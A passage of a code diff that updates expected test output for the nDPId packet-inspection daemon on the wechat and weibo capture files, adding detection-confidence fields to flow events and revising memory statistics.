 00570{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171166440,"flow_last_seen":1492171271288,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":34999,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00609{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171166696,"flow_last_seen":1492171267294,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":35000,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171166696,"flow_last_seen":1492171267294,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":35000,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00570{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171166696,"flow_last_seen":1492171267294,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":35000,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00607{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171154792,"flow_last_seen":1492171290232,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"64.233.167.188","src_port":54205,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
+00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171154792,"flow_last_seen":1492171290232,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"64.233.167.188","src_port":54205,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
 00574{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171154792,"flow_last_seen":1492171290232,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"64.233.167.188","src_port":54205,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00609{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492171176772,"flow_last_seen":1492171267576,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.34","src_port":39195,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492171176772,"flow_last_seen":1492171267576,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.34","src_port":39195,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00570{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492171176772,"flow_last_seen":1492171267576,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.34","src_port":39195,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00609{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171164904,"flow_last_seen":1492171269128,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.34","src_port":39207,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171164904,"flow_last_seen":1492171269128,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.34","src_port":39207,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00570{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171164904,"flow_last_seen":1492171269128,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.34","src_port":39207,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00609{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171168104,"flow_last_seen":1492171267294,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.34","src_port":39231,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171168104,"flow_last_seen":1492171267294,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.34","src_port":39231,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00570{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171168104,"flow_last_seen":1492171267294,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.34","src_port":39231,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00607{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167377896,"flow_last_seen":1492167468048,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.142","src_port":49787,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
+00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167377896,"flow_last_seen":1492167468048,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.142","src_port":49787,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
 00574{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167377896,"flow_last_seen":1492167468048,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.142","src_port":49787,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00158{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","total-events-serialized":722}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
@@ -728,9 +728,9 @@
 ~~ total active/idle flows...: 112/112
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 5073209 bytes
-~~ total memory freed........: 5073209 bytes
-~~ total allocations/frees...: 102254/102254
+~~ total memory allocated....: 5103946 bytes
+~~ total memory freed........: 5103946 bytes
+~~ total allocations/frees...: 103844/103844
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 163 chars
 ~~ json string max len.......: 2268 chars
diff --git a/test/results/weibo.pcap.out b/test/results/weibo.pcap.out
index f7bd642ff..18cca4bb6 100644
--- a/test/results/weibo.pcap.out
+++ b/test/results/weibo.pcap.out
@@ -15,9 +15,9 @@
 00783{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"weibo.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1463089070756,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":303,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":303,"pkt_l4_len":269,"ts_msec":1463089070756,"pkt":"kDVu60UQeJKcD6iOCABFAAEhMGVAAEARnDfAqAFp2DrS49GYAbsBDYkQDLva88\/LUhUgJkcz8vG4Z\/IO+VkPDhG6AFD7bU7A+qqkwZ+x\/RvFauDbIOOJtwCjXyUObeUIn5gQ+UX+x65qNOazAz\/4wVrPUNQeyvpM\/apVfaPKE\/BWwazlUXoAI5VQNixlUUJ1awnxsfIGiNrCTSIptZgAvLyXtwp5hhxDz3XyJujNKh8y4KxdXT+KUDUJOJJnUi42xAE7YEaRgCG0Gsvcv8KKqXj17ZhXhBURaPrZodsQJCbjs8pPzHSHwv2KhOv\/hmenV+Y+4AoEiGoPjQoanC+Mp48jh+wIc24blOr9i\/xboxYy\/SLPPtKSsAsklxNqe9J5gUDokozUo9KiuHi4kWMZ"}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"weibo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089070757,"flow_last_seen":1463089070757,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1463089070757,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":54988,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"weibo.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1463089070757,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"ts_msec":1463089070757,"pkt":"kDVu60UQeJKcD6iOCABFAAA3JrZAAEARkEXAqAFpwKgBAdbMADUAI69dsmwBAAABAAAAAAAABXdlaWJvA2NvbQAAAQAB"}
-00725{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"weibo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089070757,"flow_last_seen":1463089070757,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1463089070757,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":54988,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weibo.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00751{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"weibo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089070757,"flow_last_seen":1463089070757,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1463089070757,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":54988,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weibo.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"weibo.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1463089070841,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"ts_msec":1463089070841,"pkt":"eJKcD6iOkDVu60UQCABFAABHAABAAEARtuvAqAEBwKgBaQA11swAM884smyBgAABAAEAAAAABXdlaWJvA2NvbQAAAQABwAwAAQABAAAAJAAEcoZQog=="}
-00740{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24,"source":"weibo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089070757,"flow_last_seen":1463089070841,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":70,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1463089070841,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":54988,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weibo.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"114.134.80.162"}}
+00766{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24,"source":"weibo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089070757,"flow_last_seen":1463089070841,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":70,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1463089070841,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":54988,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weibo.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"114.134.80.162"}}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"weibo.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089070841,"flow_last_seen":1463089070841,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089070841,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59119,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"weibo.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1463089070841,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1463089070841,"pkt":"kDVu60UQeJKcD6iOCABFAAA8BZVAAEAGr+3AqAFpcoZQoubvAFC9RQISAAAAAKACchCiVgAAAgQFtAQCCAoAQQeHAAAAAAEDAwc="}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"weibo.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089070841,"flow_last_seen":1463089070841,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089070841,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59120,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -29,21 +29,21 @@
 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"weibo.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1463089071094,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1463089071094,"pkt":"eJKcD6iOkDVu60UQCABFAAA0QjAAADYG1XnYOtLOwKgBaQG7iVJFmCd++rIVGIAQCVwVnQAAAQEICm9c76IAQIN7"}
 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"weibo.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1463089071195,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1463089071195,"pkt":"eJKcD6iOkDVu60UQCABFAAA0BcYAACkGBsVyhlCiwKgBaQBQ5u8JOZF4vUUCE4ASOQhvgQAAAgQFqAEBBAIBAwMH"}
 00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"weibo.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1463089071195,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1463089071195,"pkt":"kDVu60UQeJKcD6iOCABFAAAoBZZAAEAGsADAqAFpcoZQoubvAFC9RQITCTmReVAQAOXoagAA"}
-00828{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"weibo.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089070841,"flow_last_seen":1463089071196,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":111,"midstream":0,"ts_msec":1463089071196,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59119,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"weibo.com","url":"weibo.com\/login.php?lang=en-us","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}}
+00854{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"weibo.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089070841,"flow_last_seen":1463089071196,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":111,"midstream":0,"ts_msec":1463089071196,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59119,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"weibo.com","url":"weibo.com\/login.php?lang=en-us","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}}
 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"weibo.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1463089071198,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1463089071198,"pkt":"eJKcD6iOkDVu60UQCABFAAA0IcQAACoG6cZyhlCiwKgBaQBQ5vAZ6VqE6wTXzYASOQiSSgAAAgQFqAEBBAIBAwMH"}
 00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"weibo.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1463089071198,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1463089071198,"pkt":"kDVu60UQeJKcD6iOCABFAAAo0ExAAEAG5UnAqAFpcoZQoubwAFDrBNfNGelahVAQAOULNAAA"}
 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"weibo.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1463089071348,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1463089071348,"pkt":"eJKcD6iOkDVu60UQCABFAAA0BccAACoGBcRyhlCiwKgBaQBQ5vFPiVnutrx1cIASOQjz5AAAAgQFqAEBBAIBAwMH"}
 00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"weibo.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1463089071348,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1463089071348,"pkt":"kDVu60UQeJKcD6iOCABFAAAoct9AAEAGQrfAqAFpcoZQoubxAFC2vHVwT4lZ71AQAOVszgAA"}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"weibo.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089071551,"flow_last_seen":1463089071551,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1463089071551,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":7148,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"weibo.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1463089071551,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"ts_msec":1463089071551,"pkt":"kDVu60UQeJKcD6iOCABFAAA7Jz9AAEARj7jAqAFpwKgBARvsADUAJ8YJ26oBAAABAAAAAAAAA3d3dwV3ZWlibwNjb20AAAEAAQ=="}
-00740{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"weibo.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089071551,"flow_last_seen":1463089071551,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1463089071551,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":7148,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"www.weibo.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
